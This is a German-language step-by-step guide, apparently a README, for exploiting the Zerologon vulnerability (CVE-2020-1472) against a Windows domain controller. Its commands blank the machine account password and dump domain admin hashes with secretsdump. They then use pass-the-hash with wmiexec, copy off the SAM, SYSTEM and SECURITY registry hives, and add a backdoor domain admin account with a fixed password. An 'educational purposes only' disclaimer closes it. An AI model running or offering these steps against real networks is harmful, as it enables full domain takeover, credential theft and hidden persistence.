
Zerologon-Skript zur Ausnutzung von CVE-2020-1472 CVSS 10/10
zerologon-Skript zur Ausnutzung von CVE-2020-1472 CVSS 10/10 Exploit-Code basiert auf https://www.secura.com/blog/zero-logon und https://github.com/SecuraBV/CVE-2020-1472. Ursprüngliche Forschung und Scanner von Secura, Änderungen von RiskSense Inc. https://github.com/risksense/zerologon
Um den Exploit auszuführen, entfernen Sie alle vorherigen Impacket-Installationen und installieren Sie Impacket von https://github.com/SecureAuthCorp/impacket/commit/b867b21 oder neuer.
apt update
apt remove --purge impacket-scripts python3-impacket
apt autoremove
git clone https://github.com/rthalley/dnspython.git
sudo python3 setup.py install
cd ..
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
git clone
Führen Sie dann Folgendes aus:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Wenn das erfolgreich ist, können Sie dann:
sudo secretsdump.py -just-dc domain/hostname\$@ip
Drücken Sie "Enter" bei der Passwortabfrage, um durchzukommen, was Ihnen den Domain-Admin-Hash liefern sollte. Sobald Sie diesen haben, verwenden Sie wmiexec.py auf dem Ziel-DC mit einem Credential aus dem secretsdump
wmiexec.py domain/Administrator@ip -hashes hash
und führen Sie aus
reg save HKLM\SYSTEM system.save
get system.save
del /f system.save
reg save HKLM\SAM sam.save
get sam.save
del /f sam.save
reg save HKLM\SECURITY security.save
get security.save
del /f security.save
Und dann können Sie für alle Fälle ein neues Admin-Konto erstellen,
net user myadmin Hello1234 /ADD /DOMAIN
und fügen Sie das neue Konto zur Gruppe der Domänenadministratoren hinzu, um volle Privilegien zu erhalten,
net group "Domain Admins" myadmin /ADD /DOMAIN
und beenden Sie wahrscheinlich jetzt mit exit von C:>
Dann können Sie Folgendes ausführen:
sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Und das sollte Ihnen den ursprünglichen NT-Hash des Maschinenkontos anzeigen. Sie können dann diesen ursprünglichen Maschinenkonten-Hash in der Domäne wiederherstellen mit:
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Die Wiederherstellung des ursprünglichen Hashs ist notwendig, damit der DC normal weiterarbeiten kann.
Und um sicherzustellen, dass der Wiederherstellungsprozess funktioniert hat,
sudo secretsdump.py -just-dc domain/hostname\$@ip
und das Drücken von "Enter" bei der Passwortabfrage nicht mehr funktioniert.
Und wir sind hier fertig.
Viel Erfolg bei der Jagd.
HAFTUNGSAUSSCHLUSS: Dies dient ausschließlich zu Bildungszwecken. Ich übernehme keine Verantwortung für Handlungen oder deren Folgen. DAS HACKEN IN DIE GERÄTE ANDERER IST ILLEGAL UND STRAFBAR.